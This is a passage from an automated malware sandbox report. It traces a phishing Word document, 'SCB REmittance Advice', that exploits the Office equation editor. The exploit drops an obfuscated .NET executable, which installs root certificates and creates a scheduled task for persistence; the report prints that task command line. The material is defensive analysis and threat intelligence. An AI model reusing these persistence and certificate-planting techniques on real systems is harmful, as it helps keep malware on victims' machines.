                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: SCB REmittance Advice.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SCB REmittance Advice.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: XRoS.pdb source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr
                  Source: Binary string: XRoS.pdbSHA256 source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr

                  Data Obfuscation

                  barindex
                  Source: sharonzx[1].exe.2.dr, BufferingPage.cs.Net Code: InitializeComponent
                  Source: sharon38892.exe.2.dr, BufferingPage.cs.Net Code: InitializeComponent
                  Source: XxENUzWteJXT.exe.5.dr, BufferingPage.cs.Net Code: InitializeComponent
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs.Net Code: TgFEragjVR System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.sharon38892.exe.4a0000.0.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
                  Source: Yara matchFile source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR
                  Source: sharonzx[1].exe.2.drStatic PE information: 0x84844696 [Thu Jun 14 04:35:34 2040 UTC]
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005ECA58 push esp; retf 005Eh2_2_005ECA59
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005ECA52 push esp; retf 005Eh2_2_005ECA55
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005DF94D push ebp; retf 2_2_005DF958
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F694F push ecx; ret 2_2_005F695B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F694A push ecx; ret 2_2_005F694B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F6962 push ecx; ret 2_2_005F696B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F691F push ecx; ret 2_2_005F692B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F7C0F push ecx; ret 2_2_005F7C13
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F7C07 push ecx; ret 2_2_005F7C0B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F8028 push eax; ret 2_2_005F8063
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F68FF push ecx; ret 2_2_005F690B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F57FD push edx; ret 2_2_005F57FF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F68FA push ecx; ret 2_2_005F68FB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F7BFA push ecx; ret 2_2_005F7C03
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F57F5 push edx; ret 2_2_005F57F7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005ECAB8 push eax; retf 2_2_005ECAE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005F68A8 push ecx; ret 2_2_005F68AB
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_00258310 push esp; retf 000Ch5_2_00258311
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_00258757 push esp; retf 000Ch5_2_00258758
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_002588C9 push esp; retf 000Ch5_2_002588CA
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_0025AA19 push esp; retf 5_2_0025AA25
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_0025BFA4 pushad ; ret 5_2_0025BFA5
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_046F1E30 pushad ; iretd 5_2_046F1E32
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeCode function: 5_2_046F1EBB pushad ; iretd 5_2_046F1EBC
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_00178310 push esp; retf 000Dh14_2_00178311
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_00178757 push esp; retf 000Dh14_2_00178758
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_001788C9 push esp; retf 000Dh14_2_001788CA
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 14_2_0017BFA4 pushad ; ret 14_2_0017BFA5
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 21_2_00402AC0 push eax; ret 21_2_00402AD4
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 21_2_00402AC0 push eax; ret 21_2_00402AFC
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, GUUGstbSmd7OI8KM1Z.csHigh entropy of concatenated method names: 'ScxvcCwM93', 'JSjv0WZnHM', 'S7Rv8uPWUA', 'MJH8P881xY', 'ps68zOGFla', 'hRfvF13YYQ', 'V42vBpwSdJ', 'E4uvWMKP0X', 'OBnvoOQmPT', 'sU4vErX1FD'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, b9j79nOrpIpE4FqpJQ.csHigh entropy of concatenated method names: 'XtGAkSaEQv', 'TEDA4VHdb6', 'PFFAmRsGLp', 'K4YApyJtsh', 'l8gAxXTgrc', 'inpAZpOCxL', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, HQuwQYBFxJiq99eTsrP.csHigh entropy of concatenated method names: 'mBNVdR9bEU', 'wcAVycFScX', 'cYOVrUkpsJ', 'I48VJHMWX6', 'C8dVMLWuYp', 'NRdVsJoFVj', 'ievVTNu9Dp', 'AaCVnfmAKl', 'WovVtRwyU6', 'HoXVC7c3nA'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, Fa2mLkxDVcED3b2JhR.csHigh entropy of concatenated method names: 'bsNYlgssgH', 'FPVYS7eMYr', 'c38YxJvmQu', 'tdNYU0Jt0v', 'ot6Y4wSe4a', 'lMyYmhQBWH', 'ssVYpkcaRp', 'dUeYZYYQr9', 'L08YuPAnBm', 'As6YbrNsSL'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, q2eJsEEhft2IWeOyJV.csHigh entropy of concatenated method names: 'fQ0BvxLwNx', 'fkfBgXAmWX', 'CbrBRGgGYv', 'QjTBQYSDTK', 'uK3BYdgdrn', 'cZGBasLgoJ', 'C7vyn8CuH4FBIjpWB3', 'htqMA5whJ5pnaJbvfH', 'tQmBBrHWWJ', 'KQHBoEop79'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, Kr0XM5BohuwmGLFWocb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RJsKxQBXFP', 'Kv0KUrsh3S', 'OOPK6nEvDP', 'qhbKHWWIOO', 'lhfK9JonMJ', 'KClKIuqWoN', 'bjfKwijK07'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, ng8CCcP15peLhrjZl7.csHigh entropy of concatenated method names: 'UdrVBXDRSC', 'yKkVoRq9lo', 'MU2VE79j0E', 'G7mVciP8cH', 'I31VG2iPN9', 'OsKV5oVOqI', 'ms5V8wFJ3i', 'rHRAwf5lp0', 'L5YANr6Wqg', 'fQaAOjP65o'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, gw2ephibsLpAsMI8xN.csHigh entropy of concatenated method names: 'EmQvdNffj2', 'e1mvysE0C1', 'yoTvrNrH7k', 'r7jvJRuDkU', 'WOUvMnr6r4', 'hchvscqx5c', 'rL2vTsDVCQ', 'NLZvnefGAK', 'VNyvtXNHe6', 'hemvCdJbMt'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.csHigh entropy of concatenated method names: 'JQlohUerpT', 'V1bocW9DNW', 'x3poGo6WL7', 'Nnho0eUkn3', 'sgwo5dFMxG', 'oZao8wkl06', 'GoAovQtvQx', 'UO9ogCt8ad', 'UepoDXtDVH', 'pr3oRXPq14'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, nGq4u2GTAdEScdFQ9J.csHigh entropy of concatenated method names: 'Dispose', 'MPoBOnl9lv', 'cnCW4Buk5c', 'Xtj33RPJUP', 'IUTBPnPTDW', 'DMiBzffqYh', 'ProcessDialogKey', 'nLBWF9j79n', 'zpIWBpE4Fq', 'JJQWWfg8CC'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, RTnPTDNWTMiffqYhfL.csHigh entropy of concatenated method names: 'vWwAcdIsCS', 'TDbAGhIjTP', 'dJfA0LgRyn', 'kwQA5aN7sC', 'uGhA8S7Ptf', 'KItAvLgUUF', 'HF0AgmjEIC', 'cboAD38o15', 'uRsARo9Eac', 'Eb4AQRMRBT'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, M2V7tMHwBcrZuxvNAK.csHigh entropy of concatenated method names: 'WEl2RbRhV0', 'OBE2QAeJqM', 'ToString', 'fnD2cI8Yh4', 'Nw62GMaDDw', 'PF320vLGAp', 'UPL25VvRY1', 'L9S28m13uC', 'wD12vCw1to', 'Uff2glApHd'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, ODTKZhCDXOLTgeK3dg.csHigh entropy of concatenated method names: 'Ode5M1wJnb', 'HI95TyHHP5', 'FTX0mffRBi', 'x890pE0Ewj', 'ImF0ZhOrEA', 'vKj0uJM1Gi', 'Pns0bruOCo', 'NH701icxel', 'kpC0ivR8D6', 'puK0l4xKtv'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, hxLwNxnckfXAmWXICd.csHigh entropy of concatenated method names: 'QH9GxEpeWh', 'MAJGUgO9sQ', 'ppBG6gmAZF', 'f9fGH67Lls', 'f0bG9XNQAa', 'O9kGIyEjgF', 'eSmGw6OEXK', 'QvmGNH5LO1', 'thtGOwX21n', 'Q6GGPQtWBf'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, mZ7saqjYtSTEYbUQUZ.csHigh entropy of concatenated method names: 'eaXfndPrEB', 'amwftCg7vF', 'brFfkJBi8c', 'rtGf4Dy8j1', 'Tl9fpdavrR', 'Un2fZKGYY1', 'DsrfbsyVOH', 'Buff1c0tRY', 'm3XfliN9m0', 'ejpf3I2nMU'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, LZFdEvIIaEZUtISyW2.csHigh entropy of concatenated method names: 'yE62NBDpDb', 'i642Pj4o2H', 'OwuAFLsIjL', 'k3YAB1wmAM', 'yBn23lAukL', 'FjO2Su8aHU', 'gG32jHCNMH', 'x1l2xh4LFn', 'fgq2UQthSM', 'axX26i9qwf'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, YLiES1WHhaRR217u52.csHigh entropy of concatenated method names: 'keZrISNbU', 'aFFJBnYdE', 'NiksSADgL', 'qwpTnCGax', 'sRDtAPoLT', 'BQbCI5fdx', 'zp5c8vSJQwQdvPHVjF', 'hNv8cujWHIVldHOypn', 'jj8A9qFC0', 'LAbKKZWF4'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, xrnWZGksLgoJo1blU6.csHigh entropy of concatenated method names: 'HMk8hZMJbV', 'Iqk8G3laAw', 'JlC85w5rS6', 'TAa8vtR0rF', 'Vi18gfwJG3', 'hBa593rObE', 'edV5IkLZPQ', 'aVt5wHi7NQ', 'ovP5NmCMn9', 'K3c5ObdAh8'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, KGUs3stbrGgGYvjjTY.csHigh entropy of concatenated method names: 'NLJ0J1bxVO', 'qSj0s706nF', 'LYJ0nTQXXe', 'z6V0teRyji', 'wDO0YTbNaT', 'AoW0atQBND', 'Dfc02dwMma', 'x0y0AGboRT', 'TT10VjQoNK', 'O8c0KfTcLo'
                  Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, M5wBeyzXs6BolJjqtJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oJRVf1M9Zg', 'uNjVY9ixYp', 'NgrVawuR2C', 'Gf1V22STUI', 'cV3VASNyqR', 'btTVVLLi84', 'a1LVKpR1B7'

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)Jump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\sharon38892.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
